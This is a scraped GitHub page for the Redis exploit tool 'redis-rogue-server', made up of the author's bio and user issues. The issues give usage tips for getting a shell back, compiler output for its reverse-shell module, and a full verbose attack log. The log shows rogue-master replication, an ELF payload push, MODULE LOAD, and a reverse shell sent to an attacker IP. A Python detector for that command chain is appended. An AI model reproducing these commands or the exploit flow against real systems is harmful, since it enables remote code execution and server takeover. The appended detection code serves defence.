redis-rogue-server's Introduction

Hi there 👋, I'm Tianyi Li

  • 🍇 I'm currently a blockchain security engineer at CertiK.
  • 🍎 Previously I was:
    • Senior security engineer at Antgroup, working on MPC algorithms.
  • 🔭 In school I work on:
    • Web Security & Privacy
    • Program Analysis
    • Browser Fingerprinting.
  • 📫 How to reach me: contact [AT] litianyi.site

redis-rogue-server's Issues

UnicodeDecodeError

If someone else comes across this.
I tried running the script with python3 redis-rogue-server.py. This resulted in

[->] b'$1\r\n\x83\r\n'
[err ] UnicodeDecodeError('gb18030', b'$1\r\n\x83\r\n', 4, 5, 'illegal multibyte sequence')

Running ./redis-rogue-server.py worked fine. The line before the error is then:

[->] b'$0\r\n\r\n'

Console message on make process on ubuntu 18.04

Hi, I have the next message when I do make, do you know if it is ok or is there any issue?

xxxxxx@xxxxxxx:~/redis-rogue-server/RedisModulesSDK/exp$ make
make -C ../rmutil
make[1]: Entering directory '/redis-rogue-server/RedisModulesSDK/rmutil'
ar rcs librmutil.a util.o strings.o sds.o vector.o alloc.o periodic.o
make[1]: Leaving directory '/redis-rogue-server/RedisModulesSDK/rmutil'
gcc -I../ -Wall -g -fPIC -lc -lm -std=gnu99     -c -o exp.o exp.c
exp.c: In function ‘DoCommand’:
exp.c:16:15: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
   char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
               ^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:23:8: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
    if (strlen(buf) + strlen(output) >= size) {
        ^~~~~~
exp.c:23:8: warning: incompatible implicit declaration of built-in function ‘strlen’
exp.c:23:8: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
exp.c:27:4: warning: implicit declaration of function ‘strcat’ [-Wimplicit-function-declaration]
    strcat(output, buf);
    ^~~~~~
exp.c:27:4: warning: incompatible implicit declaration of built-in function ‘strcat’
exp.c:27:4: note: include ‘<string.h>’ or provide a declaration of ‘strcat’
exp.c:29:66: warning: incompatible implicit declaration of built-in function ‘strlen’
   RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output));
                                                                  ^~~~~~
exp.c:29:66: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
exp.c: In function ‘RevShellCommand’:
exp.c:41:14: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
   char *ip = RedisModule_StringPtrLen(argv[1], &cmd_len);
              ^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:42:18: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
   char *port_s = RedisModule_StringPtrLen(argv[2], &cmd_len);
                  ^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:48:24: warning: implicit declaration of function ‘inet_addr’; did you mean ‘si_addr’? [-Wimplicit-function-declaration]
   sa.sin_addr.s_addr = inet_addr(ip);
                        ^~~~~~~~~
                        si_addr
exp.c:57:3: warning: null argument where non-null required (argument 2) [-Wnonnull]
   execve("/bin/sh", 0, 0);
   ^~~~~~
exp.c: In function ‘RedisModule_OnLoad’:
exp.c:68:5: warning: this ‘if’ clause does not guard... [-Wmisleading-indentation]
     if (RedisModule_CreateCommand(ctx, "system.exec",
     ^~
exp.c:71:2: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
  if (RedisModule_CreateCommand(ctx, "system.rev",
  ^~
ld -o exp.so exp.o -shared -Bsymbolic  -L../rmutil -lrmutil -lc 

Thanks in advance.

Specify the ports! (--rport) (--lport)

quick note for those who couldn't get a shell back, """you must specify the ports"""
Ex: python3 redis-rogue-server.py --rhost (victim's) --rport 6379 --lhost (Yours) --lport 6379 < or any port you want.

or try to exploit it manually :p

Error :[->] b"-ERR unknown command 'MODULE'\r\n"

Update: apparently the issue is with loading the Command Execute Module because the Redis command "MODULE" is not being recognized

I'm trying to use the script to exploit a Windows x64 machine running Redis version 2.8.2402 but I keep getting an error that the "system" command is unknown, so neither the interactive nor the reverse shell worked for me.
Do you have any idea why this is happening?
Below is the command I executed and the output:

└─# python redis-rogue-server.py --rhost 10.10.192.11 --lhost 10.18.123.89 -v


@copyright n0b0dy @ r3kapig

[info] TARGET 10.10.192.11:6379
[info] SERVER 10.18.123.89:21000
[info] Setting master...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$12\r\n10.18.123.89\r\n$5\r\n21000\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'PING\r\n'
[<-] b'+PONG\r\n'
[->] b'REPLCONF listening-port 6379\r\n'
[<-] b'+OK\r\n'
[->] b'REPLCONF capa eof\r\n'
[<-] b'+OK\r\n'
[->] b'PSYNC ? -1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b"-ERR unknown command 'MODULE'\r\n"
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b"-ERR unknown command 'system.exec'\r\n"
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 10.18.123.89
Reverse server port: 8888
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$12\r\n10.18.123.89\r\n$4\r\n8888\r\n'
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$12\r\n10.18.123.89\r\n$4\r\n8888\r\n'
[info] Reverse shell payload sent.
[info] Check at 10.18.123.89:8888
[info] Unload module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
[->] b"-ERR unknown command 'system.rev'\r\n"
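Added example, not part of the original issue or the project's code: a defender-side check for the command sequence visible in the log above (SLAVEOF pointing at a new master, CONFIG SET dbfilename to a non-.rdb name, then MODULE LOAD). The sample frames are constructed from the log's `[<-]` lines, the stage labels are hypothetical names, and arguments are kept as bytes because RESP bulk strings are length-prefixed and need not be valid text.

```python
# Constructed sample: RESP frames modelled on the "[<-]" lines in the log above.
SAMPLE = [
    b"*3\r\n$7\r\nSLAVEOF\r\n$12\r\n10.18.123.89\r\n$5\r\n21000\r\n",
    b"*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n",
    b"*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n",
]
# Hypothetical stage labels, in the order the log shows them.
STAGES = ["replication-target-set", "dbfilename-not-rdb", "module-load"]

def parse_resp_array(frame):
    """Decode one RESP array of bulk strings into a list of bytes arguments.
    Arguments stay as bytes: bulk strings are length-prefixed and binary-safe."""
    head, _, rest = frame.partition(b"\r\n")
    if not head.startswith(b"*"):
        raise ValueError("not a RESP array")
    args = []
    for _ in range(int(head[1:])):
        size_line, _, rest = rest.partition(b"\r\n")
        if not size_line.startswith(b"$"):
            raise ValueError("expected a bulk string")
        size = int(size_line[1:])
        if rest[size:size + 2] != b"\r\n":
            raise ValueError("truncated or malformed bulk string")
        args.append(rest[:size])
        rest = rest[size + 2:]
    return args

def classify(args):
    """Map one decoded command to a stage label, or None if it is not of interest."""
    cmd = args[0].upper() if args else b""
    sub = args[1].upper() if len(args) > 1 else b""
    # "SLAVEOF NO ONE" detaches from a master and is not flagged.
    if cmd in (b"SLAVEOF", b"REPLICAOF") and len(args) == 3 and sub != b"NO":
        return STAGES[0]
    if (cmd, sub) == (b"CONFIG", b"SET") and len(args) == 4:
        if args[2].lower() == b"dbfilename" and not args[3].lower().endswith(b".rdb"):
            return STAGES[1]
    if (cmd, sub) == (b"MODULE", b"LOAD") and len(args) >= 3:
        return STAGES[2]
    return None

def detect_chain(frames):
    """Return (labels seen in order, True if all three stages occur in sequence)."""
    seen = [t for t in (classify(parse_resp_array(f)) for f in frames) if t]
    remaining = iter(seen)  # consuming iterator makes this a subsequence test
    return seen, all(stage in remaining for stage in STAGES)
```

Feed `detect_chain` the commands one client connection sent, in arrival order, for example from a proxy or packet capture that yields whole RESP frames.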
